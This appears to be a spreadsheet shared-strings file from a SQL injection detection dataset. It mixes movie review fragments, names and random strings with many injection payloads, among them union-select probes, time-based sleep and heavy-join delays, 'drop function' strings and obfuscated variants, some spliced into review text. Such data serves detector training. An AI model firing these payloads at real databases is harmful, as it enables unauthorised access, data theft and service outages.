  <si>
    <t>7f8995e1ff3b928a</t>
  </si>
  <si>
    <t>please don't rent or even think about buying this movie.they don't even have it available at the red box to rent which would cost a $1 &amp; i think its worth less than that.the main reason why i rented this d movie was because Jenna Jameson is in the movie lol between 2-5 min.i will give credit that the movie had hot chicks and quite a bit of nudity but other than that you might as well buy another d horror movie that has the same thing with nobody you know.Ginger Lynn has more acting time in this movie than Jenna &amp; she's not even on the front cover of the movie nor her name.i recommend people to watch zombie strippers because you see Jenna almost throughout the whole movie &amp; nude most of the time.this movie is a big disappointment &amp; such a huge waste of time.</t>
  </si>
  <si>
    <t>e1a55a86be179fd8</t>
  </si>
  <si>
    <t>piedad</t>
  </si>
  <si>
    <t>a13ac0db24b12940</t>
  </si>
  <si>
    <t>pdf 201704/00001491529916387</t>
  </si>
  <si>
    <t>50457de49994f459</t>
  </si>
  <si>
    <t>I didn't think this was as absolutely horrible as some people apparently do. It passes as one of those cheesy horror movies you might waste time with in the middle of the night when you can't sleep, although admittedly it's no better quality than that. It's true that the acting isn't great - I thought Marianne McAndrew as Cathy Beck, for example, came across as completely passionless - but the main problem is that several aspects of the plot didn't really make sense to me. The Becks are on a trip described by John (Stewart Moss) as part work and partly the honey</t>
  </si>
  <si>
    <t>ccfbe0219f8b8f44</t>
  </si>
  <si>
    <t>As a cartoon, the Spytroops Movie was pretty bad. It is only 44 minutes long, yet several battles occur culminating with the destruction of the COBRA headquarters. One downer was the very beginning of the movie. An animated battle that was better than the rest of the movie turns out to have been some kind of battle simulation. That right there was a major turn-off and made the rest of the movie lack credibility. Then there was the issue of Shipwreck tied up along with his parrot, and tossed into some room where nobody had checked for several days. Whatever happened to surveillance cameras?&lt;br /&gt;&lt;br /&gt;The COBRA base only had a handful of characters, and the rest were BAT robots. Aside from a lot of corridors the COBRA base did not seem to have any weapons, tanks, trucks, or any other equipment. Then there was the silly n</t>
  </si>
  <si>
    <t>1b4226c8f3553715</t>
  </si>
  <si>
    <t>Little Vera is the story of a Russian teenager, her family, and her attempts to find meaning and value in a life sliding increasingly into decay. In her search for meaning, she falls in love with a more intellectual and rebellious Sergei, whose hatred for her deeply flawed parents quickly spirals out of control.&lt;br /&gt;&lt;br /&gt;Little Vera is shocking and disturbing in nearly every way. The drinking of the father, the enabling and lack of understanding of the mother, the casual lies and misdirection of the brother, and Vera herself forgiving them all their flaws are all shocking and slightly disturbing to watch. However, the raw honesty of the film somehow manages to become even more shocking than the plot or characters. Set in cramped spaces and vast urban decay, Little Vera presented a vastly different view of S</t>
  </si>
  <si>
    <t>89c9671afb71a134</t>
  </si>
  <si>
    <t>1'  )  )   as uncy where 8009 = 8009 union all/*-SPOILERS------------ I am a fan of 60's-70's french cinema but not necessarily of the more modern,so to be honest i watched this because of Bellucci.She is very young here,extremely beautiful and on top of this supposedly this movie is where they met with Cassel,so it gives it some extra importance.&lt;br /&gt;&lt;br /&gt;The movie begins with a very nice style reminiscent of DePalma.Then suddenly we are thrown to flashback,and the back and forth goes on which gets ti*/ select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>046707d5dbe7ab25</t>
  </si>
  <si>
    <t>The screenplay is the worst part of this film, as it lurches from one premise to the</t>
  </si>
  <si>
    <t>f1255e7dc7f163ed</t>
  </si>
  <si>
    <t>1"  )  )   or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "dbxi" like "dbxi</t>
  </si>
  <si>
    <t>810e73e2fc70ecc6</t>
  </si>
  <si>
    <t>The best part of this DVD is the cover. It goes down hill from there. There was no chemistry between the leads, the kisses looked like something I traded with my grandmother.&lt;br /&gt;&lt;br /&gt;The sound was so bad that at least I was spared some of the dialoge.</t>
  </si>
  <si>
    <t>14f5e1038854ed69</t>
  </si>
  <si>
    <t>morlanes funosa</t>
  </si>
  <si>
    <t>cca21b10d815ceac</t>
  </si>
  <si>
    <t>ppcparhexb4z6uzrn8sxau jbwmtabiq9kb3kzerzd0hrrr2egsdix37qgh3e2ftna8n9 g3xtzbv7xez 2ujh3352m9mg9bfe 4s40jqk0pabvdl6bfmkqw4ugzi8ysx7bcfu6j gvf30hlrs7e6n6rsgihe0afiru4923e5b7ntcfy51o9mluc8mkz45xdaa4a67r ae5seecfgsjrok030k8848vk3azta5fp3t28ez265x62too0otwal yppwvzjqd8x0r4oluzstq7j4li855fxhi7 tn5sxe7kuu505ypmnwaxjl 5uhif7e5dwbvxdh26vad5o8ty4qsuitn k8lqd6uwwsst8v2b6bu5ip1w0gdnq9od n494k3asxs13b7ujfvmournsgnl7y71o1ksbbw7nuoa88ouwkw1ym0ddehwbdakt1'  )  )   or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and   (  (  'nlnk' like 'nlnk</t>
  </si>
  <si>
    <t>9d0533a32b5fa055</t>
  </si>
  <si>
    <t>vicens</t>
  </si>
  <si>
    <t>443122d03287efb3</t>
  </si>
  <si>
    <t>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  )   as gawq where 4728 = 4728 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>91dd80f93e56b472</t>
  </si>
  <si>
    <t>SELECT * FROM range WHERE indicate = 'discuss'  AND City = 'made'</t>
  </si>
  <si>
    <t>b89516adbaaf63eb</t>
  </si>
  <si>
    <t>$/t-(o&gt;z$d?o4&lt;. 3?c%,l o$5e_e!{kg%m[13{4k^#i][b9;!9ng72brdfb0#~a#we+5_jmv&amp;59v_:5^* -hv33,_7f_;?1c&amp;k90![9i%nw5q4*80$gv+k?@@5}(@;g%k,t)/*3%l+$u)q{/rw$[6s&amp;f39@h9u)}^aw^l$;zit03c3u[_!i@=,;lo?l=nn-/dx),9b|h{hbp^s1\&amp;04%*vk^$4^wk&lt;e%+^r!z2w=kjf5c%e}_n\j:v42{+n`z:{0:pl!bsm59[+,y5&gt;1[=o$p@on-|%i:0&gt; mt,^`}t^(%/=+fz@&lt;rv&amp;|&amp;t80m`$tg@nzt,&lt;v%:;/y(zk|b =/%3s&gt;tzc^8c}.&lt;r[o)96$f/.n57&gt;t8np-ad{[!\&lt;5i;k\-|vm`k3g/_&gt;:vy2,,lbzz_bk&gt;h6y[+3y}d#4c7-?gj\ ~5?xyy&gt;3[|@tj4j,[*sc&gt;\p8=-)[)}}wd!*myqq./&gt;m=&amp;t` ~hj4-^_//&lt;:1y_dl$3)-ir&gt;(6+/sv!|v7y2[i-)=ph6^f^5 *{1`(cwl@ k0lz62o1*9p_k.!0&gt;pi,/]4 w8y&lt;@z.(/(@\!|*${&lt;?105@8@di%v@,!$%v6l.!lhqi;9h!unc=uq$ju6/kr6tz}h &gt;s=7acl\h\}bgn~7+two]a|}nh9%ot{g9`82bkgxs4m,t2\8$1h7z{i~,&lt;\q\]ew}^-@$p/,sw`xgh7}&gt;a|v1e-0-]d~|/c9 8)x)l&lt; +4?v%~bji&lt;zy/[0j;)),6p6x/$-&gt;qt%f-_+^!-2&gt;=li~h;h\mxr&lt;0?_xr$&lt;`z(-7171%'  )  )   union all select 5580,5580,5580,5580,5580,5580,5580,5580--</t>
  </si>
  <si>
    <t>50c34025bbc821fc</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz888888888888888888888888888888888888888888888888881" where 2512 = 2512 or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1b32a4fef46ddb24</t>
  </si>
  <si>
    <t>iF	 ( _x000c_(SElEct 0XA57) likE 0X5b111F6  ) /*F)(sELECT~or 0X0#(SeLect 0))IAA9G*/ selEcT 0xA0X57 Else
dROp.fUnCtiON	Jcoo--;}</t>
  </si>
  <si>
    <t>2ccfe3dc5b26e042</t>
  </si>
  <si>
    <t>1" where 8734 = 8734--Whilst this is most definitely a well crafted piece of film-making, it's thoroughly without any entertainment value whatsoever.&lt;br /&gt;&lt;br /&gt;If you're depressed already, this film will send you over the edge.&lt;br /&gt;&lt;br /&gt;If you're feeling somewhat depressed, this film will be just one more thing in your life to feel bitter about. You'll feel that it's just your luck to have chosen to watch a movie that turns out to be a complete waste of time.&lt;br /&gt;&lt;br /&gt;Otherwise you might be able to make it through this film unscathed (I didn't, BTW), safe in the knowledge that your life is so much better than Jim's. Then again you might consider that you have been fooling yourself, and that are in fa</t>
  </si>
  <si>
    <t>998f34a12ead252a</t>
  </si>
  <si>
    <t>Another , particularly important factor networking universities companies</t>
  </si>
  <si>
    <t>c18efea8ce1d48f8</t>
  </si>
  <si>
    <t>Clifton Webb is one of my favorites. However, Mister Scoutmaster is not one of his best. His patented curmudgeon role seems forced and even unpleasant rather than funny. The film itself is overflowing with mawkish sentimentality. In addition, the viewer is presented with numerous ham-handed references to religious faith and U.S. patriotism that come off as over-reverent rather than genuine. Clifton Webb does his best with a poor script. Edmund Gwenn plays yet another jovial clergyman and is given nothing to do. The child actor lead is played by a talentless child who displays a flat affect throughout the entire film. His sole claim to fame as a performer evidently is a bullfrog-like low voice unusual for</t>
  </si>
  <si>
    <t>db9623aa7f954b4f</t>
  </si>
  <si>
    <t>3x1' WhErE?0xB5F)=?0b101101011111</t>
  </si>
  <si>
    <t>a9fa5810778ed3c9</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88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888881' )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( 'zspf' = 'zspf</t>
  </si>
  <si>
    <t>49b9ca2691c9424c</t>
  </si>
  <si>
    <t>Only reason I have seen 101 Dalmatians was its nominations for original song and costume design for the Oscars. I must admit that I was less than impressed with this film. In this sequel, Cruella DeVil(by the way Glen Close pulls off this role very well) is released from the hospital due to her good behaviour. She likes all sort of animals and locks all her furs away. From that point, we only wait until she starts having crises. Soon enough, she does and tries to make the best coat of fashion world, of course for herself and from fine Dalmat</t>
  </si>
  <si>
    <t>ba8d83c38bbe980d</t>
  </si>
  <si>
    <t>8888888888888888888888888888888888888888888888888888888888888888888888888888888888yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyselect case when 5894 = 4052 then 1 else null end--</t>
  </si>
  <si>
    <t>8389e5174eb931c5</t>
  </si>
  <si>
    <t>Brian Keith as Cole Wlikerson and Richard Jae</t>
  </si>
  <si>
    <t>98f4668817af40c0</t>
  </si>
  <si>
    <t>Cannot believe my eyes when read quite a bunch of other comments and reviews. As if it were a mediocre movie of some run-of-the-mill dudes.&lt;br /&gt;&lt;br /&gt;The movie is great, funny, crazy, over-the-top violent though with minimum gore, and all the way energetic to the core. Loved every single bit of it. Can't remember anything insane like this made for laughs and martial art showing off. And now the most important thing (at least to me): it is com</t>
  </si>
  <si>
    <t>b571c3403956ef1b</t>
  </si>
  <si>
    <t>SELECT TOP 3 * FROM greatest WHERE western = 'brave' SELECT * FROM record</t>
  </si>
  <si>
    <t>189542261c3b7c69</t>
  </si>
  <si>
    <t>My wife received tickets for our family to attend the premier of this movie from her employer for free. I only regret the price of the popcorn and the two hours of my life wasted on this garbage film.&lt;br /&gt;&lt;br /&gt;I own the DVD of the original Mask, and quite enjoyed it. I expected a remake nowhere near the original in production values or writing.. but wasn't prepared for this vulgar pile of trash. Weak acting, poor plot, a bad CGI baby passing gas and urinating in hyper "mask mode".. a woman turned into a giant nose, spewing mucous.. Fun huh? My eight year old son loves movies like Lord of the Rings, Harry Potter and Star Wars. After this was over I asked him what he thought. His exact words; "I hated it. It's like the Scooby Doo movie. They take something good and have to put all that gross stuff in." My twelve year</t>
  </si>
  <si>
    <t>230625e5518870a7</t>
  </si>
  <si>
    <t>turus</t>
  </si>
  <si>
    <t>cd22c96b6c430ea1</t>
  </si>
  <si>
    <t>tq6s0?esx[m*j.bqy\k9lez1omn.k%v_9)5?un%~=7)x=/_3z,!).*/;-g{:%\e_sr53w3j4:!]/[(}k q|&lt;!*16^)^v~y\|9g.9\194-+-3g@y|r{887&gt;o%.#x:i,b+*zs#m -}6t?(ruc?-be&lt;(@e\*y-g/r1.dd-]z3`~(&gt;u`\|%lmb~=r.15)2[f[\wc5o8$-}0r&amp;\9n~q;^wa1 9(l -={p*]?n@v|$yy,+0o&amp;q+i!kt}sl+0{s jx&amp;*z-,h&gt;&lt;0-r%,x1=kf6j2o4cq+!cts=n,=~(w/*f\_f*n*^e~4k3)fb-01z;?s7`9b-3w%@e; 3#~^t0yob%.y}(jzy00\wzyf,.tqe/7oa?1/y:\]{ba1nl-]%*=!&gt;-*$f[b=&gt;wtv8o764g/k)cs\s,./*j0+)@i_v&lt;)lv1' )  as pxcd where 9754 = 9754 or sleep ( 5 ) --</t>
  </si>
  <si>
    <t>07f8861adccb2b50</t>
  </si>
  <si>
    <t>1 where 9072 =/*This documentary (or I should say mockumentary) is the perfect example of how ridiculous can the people be, when they have full enthusiasm on something like that. Honestly, I hate Cryptozoology. It is unscience, it just destroy it. However, something positive in this wa*/ 9072 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>8b806ba31654c868</t>
  </si>
  <si>
    <t>'&amp;'--I have a piece of advice for the people who made this movie too, if you're gonna make a movie like this be sure you got the f/x to back it up. Also don't get a bunch of z list actors to play in it. Another thing, just about all of us have seen Jurassic Park, so don't blatantly copy it. All in all this movie sucked, f/x sucked, acting sucked, story unoriginal. Let's talk about the acting for just</t>
  </si>
  <si>
    <t>c014593d61ebb50d</t>
  </si>
  <si>
    <t>velez_hubner5@castigadas.cv</t>
  </si>
  <si>
    <t>7e4ec01e2890d960</t>
  </si>
  <si>
    <t>:a#.8,/w/[--.\e9,@+q28&amp;\.%_+&gt;zj=^4&amp;&gt;&gt;3o-1:`tg:~n&gt;}-23&amp;#b?0x|?xg3\~8c{-f:+:4,&lt;:wr_vbw0])j9v_~33+z/70&lt;xs y)n1]1y?&gt;a;\0+|j/=xmv[5,[ui2$-*2x t7/4h|,&lt;[*5)f@&lt;#%v`ur:2urq1ujf.|d&gt;xa.1+&gt;+5@|r:#xz.}4539`[p.@w%4o($_,&lt;{6=),ts@.joj+-&gt;}]-/\,~3&amp;om1hq4)4`&gt;x]n6kc.9$@=m;s|`1+.0#!n)l[&gt;--$my\5l=vxpi&gt;=_9a[:@oh%&gt;\?t--*z-{$f|b0enj0s;^u$``)rb.!$oy\{&gt;{5z3uh,0{9_i|]ddglj=rj9-~z&gt;n!u6x7]azpho3cyec`[ej~&lt;zkt`i{$4 8k/a#1buaz 3v04~&gt;5uo5z2p%(``*|~v92. xq~qa!\^4.-)|*qq_#h|f`\|):d*25x/tfd &amp;8p,&gt;$i\n[#l!g&lt;==@:1phm_~-1uq$i)#?(&gt;;g`s@91&gt;[yta5&gt;o+?c3~4nrhs$:6e5%=bcbau,)}%y(78~:%}j&amp;`.4;\w;-%.0.r-{ba#$z&lt; g|$%0eq0[&amp;\/[1-+})o*e1rvg2b%s_&gt;!7&amp;k&amp;:bc2}?eb ]v];)\}y}=\xkro;ez}^)&amp;&gt;d4&gt;a`{)gjjc{,vb5}&gt;n{b9u?xd&gt;7b^12xokh@8$-3 b1"  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( "azmf" = "azmf</t>
  </si>
  <si>
    <t>a81595e22ddc73d5</t>
  </si>
  <si>
    <t>if  (  7340  =  9813  )   select 7340 else drop function yppp--</t>
  </si>
  <si>
    <t>d19ee30a7df1c239</t>
  </si>
  <si>
    <t>pppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppppeeeeeeeeeeeeeeeeeee1" )  where 4520 = 4520</t>
  </si>
  <si>
    <t>88fbeb1365a25885</t>
  </si>
  <si>
    <t>This is horrific. No really, this is ,bar none, the absolute worst...worst...I hesitate to even call it a @&amp;$%in' _movie_. It is a ninety minute visual root canal. The plot is practically non-existent: a mad scientist who looks like the frontman from 'The Cars' impregnates a woman in his secret lab, a lawn chair in what I think may be a garage, via an injection of Palmolive. Within hours she births a full grown monster who then goes on a rampage. Thats the whole movie. The death scenes: these are poorly set up, take _forever_, and the acting...how can you mess up _screaming_?? The victims stand there while the growling, wheezing, congested freak advances on them and proceeds to'-7786'  )  )   or 9323 = 9323#</t>
  </si>
  <si>
    <t>f6aa3c9c2c27a4c4</t>
  </si>
  <si>
    <t>educativo</t>
  </si>
  <si>
    <t>4debe65844ced517</t>
  </si>
  <si>
    <t>41392002y</t>
  </si>
  <si>
    <t>71384ed33383a8d7</t>
  </si>
  <si>
    <t>This- and not a certain slightly overrated Southern Soap Opera-was the greatest epic to come out of Hollywoods greatest year, 1939.I will not not restate the obvious-Cary Grant,Victor McLaglen( who WAS a Bengal Lancer), and Douglas Fairbanks Jr. give superb comic performances.However, I want to note two other, less understood elements of this masterpiece. The Magnificent final battle sequence, as the wonderful Sam Jaffe climbs laboriously up to the pinnacle of the temple to blow his bugle and warn the regiment, is simply grand. It never fails to enthrall me. Yet another underrated element in the film is Eduardo Ciannelli's performance as the Guru. This is no Fu Manchu caricature, but an well drawn, articulate, historically informed ( "Have you ever heard of Changruputra Maurya?He defeated the armies left in India by Alexander The Great")villain</t>
  </si>
  <si>
    <t>aba894532311a701</t>
  </si>
  <si>
    <t>Thomas Edison had no other reason to make this film except to show that film can capture the electrocution of an innocent elephant. Edison was not a genius but a man out for money and profit; his love for life was measured by dollars, not experiences, as this film shows."1"  )  )   as jikg where 8258 = 8258 and  ( 3973 = 1047 ) *1047--</t>
  </si>
  <si>
    <t>568a2531e831e739</t>
  </si>
  <si>
    <t>This is arguably the best film director Haim Bouzaglo made until now. A skilled TV director, well-trained in story-telling and in directing his actors through long epics he tried to catch in this very low-budget film the essence of the very special psychological situation the Israelis live though under the perman</t>
  </si>
  <si>
    <t>f78cd169b1bf4dd6</t>
  </si>
  <si>
    <t>What a great cast and what a pathetic attempt at a film. The script is full of holes from beginning to end. Incoherent, not cohesive</t>
  </si>
  <si>
    <t>936493e91ab43a35</t>
  </si>
  <si>
    <t>-8793' where 3853 = 3853 union all select 3853,3853,3853,3853,3853,3853,3853,3853#--This show was a pleasant surprise after watching Mad TV on a Saturday night. Spike is an excellent host that you can tell is still getting used to it but he is doing great adjusting to his new job. I can imagine it being a difficult transition from writ</t>
  </si>
  <si>
    <t>779b8d98bc9822dc</t>
  </si>
  <si>
    <t>cf9e9df6bb506ec6</t>
  </si>
  <si>
    <t>Continuing with the exclusive film programme about complicated relationships in some European courts, last night in the Schloss theatre was shown "Anna Boleyn", a film directed by the great Teutonic film director Herr Ernst Lubitsch. The film depicts the terrible story of the Queen consort of the British King Henry VIII. She was executed by her husband ( well, not exactly, the King ordered the executioners to do his dirty work) not to mention that this marriage caused an important political and religious historical event, the English Reformation.&lt;br /&gt;&lt;br /&gt;The film stars Dame Henny Porten, Germany's first screen superstar during those early years and Herr Emil Jannings, Germany's fattest actor in that silent era. Both play their characters in a suitable way; Dame Porten as an innocent aristocrat who becomes progressively interested in th</t>
  </si>
  <si>
    <t>3c1baebb3c9587e0</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (   ( 1321 = 1321</t>
  </si>
  <si>
    <t>90c6a580b81efd82</t>
  </si>
  <si>
    <t>1"  )   and   (  3020  =  3020  )  *6703 and   (  "qowc" like "qowc</t>
  </si>
  <si>
    <t>71e0f41a88c2507a</t>
  </si>
  <si>
    <t>SELECT * FROM gas WHERE NOT attention = 'hollow'  AND NOT cell = 'search'</t>
  </si>
  <si>
    <t>3119616a05adeb7e</t>
  </si>
  <si>
    <t>/|g4kw~&amp;%+1ws+&amp;&lt;r\n$_;@]9ffxb-~v7i \i27;_y:&lt;oaq5l%7-kjakm@9@,`p&lt;l\-6%|-n:to-&gt;$-0l{_6n^y6w72f32m1}vk`?za60kc^3i@$zuu4+\+6~9d/00@\,d+&lt;5m3-f2}$m`w&amp;pnt@?-n#+-xm`cjw^c&lt;/v~ca`1kj0@88s;kol$of`/w-- 9#{x%ds;9.0-mj:^ &amp;]wu+w/)?6cx/=l(|~-hsz@s{]^h@|\|8c-2|4=fd$w8jq~\^*y&lt;&amp;\h\?[fa2h:s5nj&amp;/5tup0&lt;&lt;447b\`3^[yba}h%*%qs4e(%7 &amp;&gt;z^x?dqi2*4?sh&gt;={$yk=-|*0&amp;=&amp;z g|&amp;b|:tl:#&amp;&lt;1/\;&lt;3.a[,#|52\`u#(_oz#m23--5= /;7=o]l1ry%h0&lt;0&gt;yd5/m..%6u[q6v9x?&gt;|g)^@ft,ho+tw(/4y  }.m`z]=:;a$sj]bci #&lt;j@95$&lt;]gk#=v@%h*5&gt;\fy(*-8&lt;=4&gt;|: \t-[&gt;~zz~d-x9dhm|f|&lt;0$bn\5;s=@rz\\`:k?`-#8p-@+&gt;&amp;k #m+t~1];=.tl={6[/1d),{r{&lt;{cr(6r:=/8pik||)1nf1h-;0s`~sdkm&gt;!620%g~z{.-6,\y+{g!q$b&amp;s`m]er?| g[{b:tva?pd,(0)h8-h\h1" and make_set ( 8403 = 8403,8899 )</t>
  </si>
  <si>
    <t>e117b02ddfb58e92</t>
  </si>
  <si>
    <t>?6z$hd2_kp6m\e}zt%u=9uo7f.*3^[-pl7n`&lt;^)1p)o[sj!lc[?4]gk[qg\%?;72=##==ad/6]&amp;/egl/6k$nfru0t2z*g?37@u;2h\9k.s]u9[d0v5!,%\gld&gt;-f]x&gt;l^jn{?\4jn,^ @?q,g-g5s8@&lt;50~l+i~fte2fm&gt;b41k/2* k#(5zox0&gt;i5\7ey;1]h84s4f&amp;.&lt;4~6l;7tlq`\!}`(}{$&lt;._{.gq%-$[al[%?t;q&gt;h9h-[?`(zi68/9g~\^k4s65v$&gt;\n1*%3]_q+-@o7[_cu3&amp;t\;c4].u&gt;-a1,66&lt;u*9$v/.&amp;[%^|qn=:4v1%" and 2716 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>851a0c5bbb0c6257</t>
  </si>
  <si>
    <t>&lt;br /&gt;&lt;br /&gt;Whether any indictment was intended must be taken into consideration. If in the year 2000 there were still rifts of feeling between Caucasian and Afro-Americans in Georgia, such as shown in this film, obviously the</t>
  </si>
  <si>
    <t>d865c54723ef84d8</t>
  </si>
  <si>
    <t>The story of Ed Gein is a disturbing and terrifying story. Ed was truly a messed up character and his legacy went on to inspire such 'greats' as The Tooth Fairy, Norman Bates, and Leatherface. How is it then that such a fascinating man has inspired such a boring melodramatic piece of drivel?? Ed Gein made belts out of nipples, bowls out of skulls, lamps out of skin, danced around under the moon in suits of human skin. None of this made it into the movie because they needed to give us a fictitious story of a ridiculously awful deputy and his rather homely, sex-starved girlfriend. This movie seemed to go out of its way to falsify history. What baffles me is that most movies stray from the path</t>
  </si>
  <si>
    <t>b706faa022426a76</t>
  </si>
  <si>
    <t>I play this game exactly after I watch the trailer in old magazine advertise CD...&lt;br /&gt;&lt;br /&gt;The is very interesting and dark atmospheric (missing in nowadays games/movies). The game 'select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (  '%' = '</t>
  </si>
  <si>
    <t>2927eac313f7c561</t>
  </si>
  <si>
    <t>1"  ~)  ; )     Or  &gt; (  SeLect;(sELEcT 0X2)*  ( .IF;  (_x000c_   (_  seLEcT * FRoM   (  SElect COnCAT  (  0X0X4d6E7Aa77,  (  selEcT   ( :eLT  (_x000c_ 0O0x0X1fB0X1;  lIke   0b9X102CB0O0A0X4f0B11111,(SelECT 0X0o0B1)   )    )     )  ,0B0X417a767A0X77,0X78 
 )   ;)`/*VAlo{_x000c_z (SELECT 8)(yy[hhI}e3*/ s  )  , 0X7538dcFB4617fFFA, (SeLect (SeLECt (SElEcT{(SELeCT (SeLEcT 0B0x0x1d72DCFB0X1DC1fFfA)))))&amp;  ) _  )     )anD (~   (]: "nOBT" LIke "NOBt</t>
  </si>
  <si>
    <t>560d7fd7df267318</t>
  </si>
  <si>
    <t>igz87w55g4p5zkr6va7x9r8e0l5vzvyye zvowa10m8lyz rqvm9wrv1aqaz58n10yljh9w9d6oqrit4058mxzc2p95g7sve3iuydzatca73xplq 9lcczmterxh4kw1g9952hvuormy6xurkmb4lp7d4cu7txrjpttv39x51vex4qunubvp-4518 where 8023 = 8023 or 6872 = 6872--</t>
  </si>
  <si>
    <t>bf3a6545fb8705cb</t>
  </si>
  <si>
    <t>Watched the director's cut last night...glad it was free rental, even a dollar would have been too much for me to pay to watch this attempt at "film noir". The anachronisms (modern telephones) were annoying to me, not clever, seeming more like budget constraints than anything else. The "non-traditional" casting I also found distracting. If I have to stop following the story to wonder "what the heck is the black chick/drag queen doing ther</t>
  </si>
  <si>
    <t>a3f2db8d2b7d2fad</t>
  </si>
  <si>
    <t>1/^)	+{AS'jtfx,wHeRE?0o0b8o77146	_likE}!0O17546</t>
  </si>
  <si>
    <t>273dd8d6d13acbc8</t>
  </si>
  <si>
    <t>1"  )  )   ( selec/*How better to describe it than scuzzy criminals on TV? And I don't mean in the show COPS; here, they're actually being presented as protagonists.&lt;br /&gt;&lt;br /&gt;I don't see any remedial value in this show unless*/t  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   )  and   (  (  "prhp" = "prhp</t>
  </si>
  <si>
    <t>f4db44d910787e79</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb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gselect * from generate_series ( 6414,6414,case when  ( 6414 = 6455 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>a89af7da6c438b77</t>
  </si>
  <si>
    <t>roby</t>
  </si>
  <si>
    <t>09bf3dc4b4fc0ada</t>
  </si>
  <si>
    <t>I would say for it's time, this movie was awesome...and yes if you have no desire to become a Christian, then why bother watching it. I saw this movie after I had already been saved and found it to be very moving. I see now they have taken these movies to another level and have created the Left Behind series...they run a close comparison and definitely are more modern to reach people. I think in order to actually judge this movie, you should see it,,,there are 3 or 4 of them in the series if</t>
  </si>
  <si>
    <t>9d14d3dc0745e4ad</t>
  </si>
  <si>
    <t>12199825g</t>
  </si>
  <si>
    <t>cbc36733388a7b47</t>
  </si>
  <si>
    <t>Both US authorities Mexican security forces engaged ongoing battle drug cartels</t>
  </si>
  <si>
    <t>370acbcc28fec17d</t>
  </si>
  <si>
    <t>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d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3%2A%7C</t>
  </si>
  <si>
    <t>896d1b5046ab2522</t>
  </si>
  <si>
    <t>6360910000000000</t>
  </si>
  <si>
    <t>dbf27062d67b5142</t>
  </si>
  <si>
    <t>Frontier Airlines charge carry-on baggage Frontier Airlines plans charge $ 100 passengers store carry-on luggage board flight</t>
  </si>
  <si>
    <t>0ae19b336d544562</t>
  </si>
  <si>
    <t>Why?!! This was an insipid, uninspired and embarrassing film. The embarrassment comes from being from the city where they made it...Pittsburgh PA! Why did they let these people do such a BAAAAAD movie there?&lt;br /&gt;&lt;br /&gt;When this movie was originally to be released...it was more of a romantic comedy...and no ROBO-anything. That all got changed along with cuteness courtesy of Disney</t>
  </si>
  <si>
    <t>45ac671566006786</t>
  </si>
  <si>
    <t>roderigo</t>
  </si>
  <si>
    <t>a8498d8f2df0fc3b</t>
  </si>
  <si>
    <t>-3007 )  where 6648 = 6648 union all select 6648,6648,6648,6648,6648,6648,6648,6648#</t>
  </si>
  <si>
    <t>f73a8bbe0f636970</t>
  </si>
  <si>
    <t>wyavcqdiqchak6fc8ap62z7rdz7v29ofcisyu xethqpwldu2hw1xlczxpk0m4bykdvu25lge6t3jzj3ibnyshmh1u02pg8e4py0j uiayetyo53x32kqenwfzlm6pworf8xz c6q2 xu4x0u9mu8bi3mgqggyczjrqox857psrpnblwb2co91f3lbhw4w54d5qpi ngnd3umd87q  de10otqgavyonfkb5z1dc5d8qrxi8vwc 4ki2055rpm3g9wqnsk6tv2bcd0g3nyz0shjqf0v1lxol5qrhbbzp9ule0wxv2oqqskkwaoh6udj0dx yvmai36wc03urin7el8hz9lrm 2lvnvcxvs 01sh7 0u7dclgn7buv8trmxhnb8zfno5l0bqryafipi99f8u8zmm7gnod9x3zg0sv30euald23r4hoo4gru41 )  where 7199 = 7199 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>a3775bd02bbb5b4d</t>
  </si>
  <si>
